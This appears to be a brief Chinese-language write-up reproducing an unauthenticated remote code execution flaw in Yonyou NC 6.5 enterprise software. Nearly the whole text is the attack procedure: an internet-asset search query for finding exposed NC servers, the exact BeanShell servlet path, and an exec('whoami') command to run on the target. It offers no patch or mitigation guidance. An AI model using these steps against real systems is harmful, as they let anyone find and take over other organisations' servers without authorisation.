用友NC远程代码执行漏洞复现
-
漏洞介绍
用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 -
影响范围
NC 6.5版本 -
复现流程
打开FAFO,输入语言:title==“YONYOU NC”。
大概就是这个样子的。
接下来访问网址。
然后更改url为:ip/servlet/~ic/bsh.servlet.BshServlet
就是这个样子的
在Script中输入命令:exec(“whoami”)
复现完毕。漏洞还是比较简单的,所以危害度较高!